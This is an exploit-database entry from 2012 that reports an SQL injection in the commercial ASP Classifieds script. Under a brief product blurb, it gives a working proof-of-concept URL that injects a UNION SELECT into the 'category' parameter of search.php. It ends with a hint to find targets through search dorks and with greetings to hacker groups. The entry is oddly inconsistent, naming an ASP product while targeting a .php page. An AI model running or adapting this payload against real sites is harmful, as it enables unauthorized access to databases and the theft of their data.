ASP Classifieds - SQL Injection



EKU-ID: 24336 CVE: OSVDB-80580;CVE-2007-2675;OSVDB-35597 OSVDB-ID:
Author: r45c4l Published: 2012-03-17 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: ASP Classifieds Sql Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Product Description :

ASP Classifieds is one of the most customizable Classified ad program
that exist for ASP and Access. Unlimited Images , unlimited categories
and much much more makes it perfect for those who wants to set up a used
stamps classifieds to those wanting to show and sell real estates.


Product Cost : 58$



=======================Exploit====================================
                      ---ICW---



[ EXPL0!T ]

SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]

PoC -

http://SERVER/classi/search.php?category=-1+union+all+select+version()--

[Note: Tested on demo website]

d0rk - use your brain ;)

===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam

All members of ICW, AH and darkc0de, and all Indian Hackers



Special Greetz to : b4ltazar and s1nner_01


=== End () ====